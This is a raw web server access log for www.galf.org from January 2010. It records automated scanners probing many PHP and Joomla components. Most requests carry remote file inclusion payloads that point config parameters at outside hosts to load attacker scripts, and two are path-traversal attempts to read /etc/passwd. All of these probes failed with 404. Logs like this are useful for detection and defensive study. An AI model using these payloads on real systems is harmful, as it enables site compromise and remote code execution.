88.212.201.94 - - [04/Jan/2010:04:30:37 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:42 -0800] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:42 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:30:43 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:04:31:21 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:04:31:21 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.185.231.103 - - [04/Jan/2010:04:31:22 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:31:43 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:31:43 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:31:43 -0800] "GET /logs/access_091026.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:31:47 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:31:47 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:31:47 -0800] "GET /logs/access_091026.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:31:51 -0800] "GET /logs/access_091228.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.19.194.26 - - [04/Jan/2010:04:31:52 -0800] "GET /logs/access_091228.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:11 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:11 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:12 -0800] "GET /logs/access_090921.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:42 -0800] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:42 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:42 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:45 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:45 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:45 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:45 -0800] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:45 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:32:45 -0800] "GET /logs/access_090921.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [04/Jan/2010:04:32:53 -0800] "GET /logs/access_090706.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aerodemo.com//mycanvas/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [04/Jan/2010:04:33:24 -0800] "GET /logs/access_090817.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aerodemo.com//mycanvas/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:04:34:37 -0800] "GET /logs/access_091012.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:04:34:37 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:04:34:39 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.172.170.33 - - [04/Jan/2010:04:34:42 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.172.170.33 - - [04/Jan/2010:04:34:42 -0800] "GET /logs/access_090817.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.172.170.33 - - [04/Jan/2010:04:34:42 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:34:43 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:34:43 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:18 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:18 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:19 -0800] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:26 -0800] "GET /logs/access_090921.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:31 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:31 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:35 -0800] "GET /logs/access_090921.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:45 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:45 -0800] "GET /logs/access.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:36:45 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
64.34.177.222 - - [04/Jan/2010:04:36:45 -0800] "GET /logs/access_091012.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:04:36:45 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.34.177.222 - - [04/Jan/2010:04:36:46 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
202.172.170.33 - - [04/Jan/2010:04:37:38 -0800] "GET /logs/access_090817.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:38:11 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
71.250.232.26 - - [04/Jan/2010:04:39:07 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.37.161 - - [04/Jan/2010:04:39:10 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.37.161 - - [04/Jan/2010:04:39:10 -0800] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
222.239.255.101 - - [04/Jan/2010:04:39:11 -0800] "GET /logs/access_091207.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
222.239.255.101 - - [04/Jan/2010:04:39:11 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:39:13 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:39:13 -0800] "GET /logs/access_091221.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.255.101 - - [04/Jan/2010:04:39:16 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:39:42 -0800] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:04:40:54 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:40:54 -0800] "GET /logs/access_091228.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:40:54 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:41:04 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:41:04 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:41:04 -0800] "GET /logs/access_091228.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.110.192.139 - - [04/Jan/2010:04:41:48 -0800] "GET /index.php?pagina=/../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
95.110.192.139 - - [04/Jan/2010:04:41:48 -0800] "GET /logs/index.php?pagina=/../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:41:58 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:41:58 -0800] "GET /logs/access_090720.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:41:58 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:41:58 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:41:58 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:41:58 -0800] "GET /logs/access_090720.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:42:37 -0800] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:42:37 -0800] "GET /logs/access_090720.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:42:37 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:42:39 -0800] "GET /logs/access_091019.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:42:46 -0800] "GET /logs/access_091019.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:43:17 -0800] "GET /logs/access_091019.log%20%20//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [04/Jan/2010:04:45:47 -0800] "GET /logs/access_090914.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aerodemo.com//mycanvas/images/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.119.103.12 - - [04/Jan/2010:04:47:08 -0800] "GET /logs/access_090706.log%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aerodemo.com//mycanvas/images/1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.136.216.20 - - [04/Jan/2010:04:47:10 -0800] "GET /logs/access_090615.log%20%20//songinfo.php?commonpath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.136.216.20 - - [04/Jan/2010:04:47:10 -0800] "GET /songinfo.php?commonpath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.136.216.20 - - [04/Jan/2010:04:47:10 -0800] "GET /logs//songinfo.php?commonpath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.136.216.20 - - [04/Jan/2010:04:47:14 -0800] "GET /logs/access_090921.log%20%20//songinfo.php?commonpath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.207.138 - - [04/Jan/2010:04:47:21 -0800] "GET /labia/?S=A HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:47:25 -0800] "GET /logs/access_090720.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:47:30 -0800] "GET /logs/access_090720.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:47:31 -0800] "GET /logs/access_090720.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:47:34 -0800] "GET /logs/access_091019.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:47:38 -0800] "GET /logs/access_091019.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:47:39 -0800] "GET /logs/access_091019.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:49:53 -0800] "GET /logs/access_091221.log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:49:56 -0800] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:49:56 -0800] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.136.216.20 - - [04/Jan/2010:04:52:34 -0800] "GET /logs/access_090615.log//songinfo.php?commonpath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.136.216.20 - - [04/Jan/2010:04:52:34 -0800] "GET /logs/access_090921.log//songinfo.php?commonpath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:53:39 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:53:39 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
71.250.232.26 - - [04/Jan/2010:04:53:39 -0800] "GET /logs/access_091228.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://alandar.net/www2/log1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:04:57:44 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:04:57:49 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:04:57:49 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:04:57:49 -0800] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.173.108.196 - - [04/Jan/2010:04:57:59 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)" "www.galf.org"
85.173.108.196 - - [04/Jan/2010:04:58:07 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)" "www.galf.org"
88.212.201.94 - - [04/Jan/2010:04:58:39 -0800] "GET /logs/access_091228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.143.249 - - [04/Jan/2010:05:00:06 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:00:06 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.143.249 - - [04/Jan/2010:05:00:06 -0800] "GET /logs/access.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://koplakirc.kilu.de/tcl/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
88.212.201.94 - - [04/Jan/2010:05:02:12 -0800] "GET /logs/access_091228.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
193.136.216.20 - - [04/Jan/2010:05:02:37 -0800] "GET /logs/access_091228.log//songinfo.php?commonpath=http://paroleproibite.com/administrator/components/com_settings/image1.jpg??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
